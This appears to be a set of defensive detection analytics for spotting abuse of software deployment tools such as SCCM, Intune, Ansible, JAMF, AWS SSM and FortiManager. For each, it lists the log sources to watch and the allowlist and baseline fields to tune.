Detects SCCM, Intune, or remote push execution spawning scripts or binaries from SYSTEM context or unusual consoles (e.g., cmtrace.exe launching PowerShell or cmd.exe).
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Security | EventCode=4688 |
| Application Log Content (DC0038) | WinEventLog:Application | SCCM, Intune logs |
| Field | Description |
|---|---|
| ParentImageList | Allowlist of known SCCM-related binary spawners (e.g., 'CCMExec.exe') |
| UserContext | Expected deployment activity from scheduled system accounts |
| TimeWindow | Unusual deployment timing outside standard maintenance hours |
Detects remote scripts or binaries deployed via Puppet, Chef, Ansible, or shell scripts from orchestration servers executing outside maintenance windows or in unmanaged nodes.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | auditd:SYSCALL | execve |
| Field | Description |
|---|---|
| DeployingHostAllowList | Approved orchestration or jump box IPs |
| ScriptExecutionBaseline | Expected scripts, interpreters, or package managers used |
Detects script or binary execution initiated via JAMF, Munki, or custom MDM agents outside of baseline, or JAMF launching new Terminal or osascript processes from remote command payloads.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | macos:unifiedlog | process and signing chain events |
| Application Log Content (DC0038) | macos:jamf | RemoteCommandExecution |
| Field | Description |
|---|---|
| SigningAuthorityList | Expected signing authorities for JAMF and MDM scripts |
| RemoteCommandInterval | Frequency of remote execution from MDM servers |
Detects cloud-native software deployment or management (e.g., SSM Run Command, Intune) initiating script execution on endpoints outside expected org IDs, admin groups, or maintenance windows.
| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | AWS:CloudTrail | SSM RunCommand |
| Field | Description |
|---|---|
| IAMRoleAllowList | Approved deployment administrators or service accounts |
| ExecutionTargetList | Expected endpoints targeted by SaaS deployments |
Detects central router or switch config management tools (e.g., FortiManager, Cisco Prime) triggering device reboots or config pushes using abnormal accounts or IPs.
| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | networkdevice:syslog | config push events |
| Network Traffic Flow (DC0078) | NSM:Flow | Device-to-Device Deployment Flows |
| Field | Description |
|---|---|
| PushSourceAllowList | Devices or IPs allowed to push firmware or scripts |
| AuthUserPattern | Expected CLI or API user performing configuration |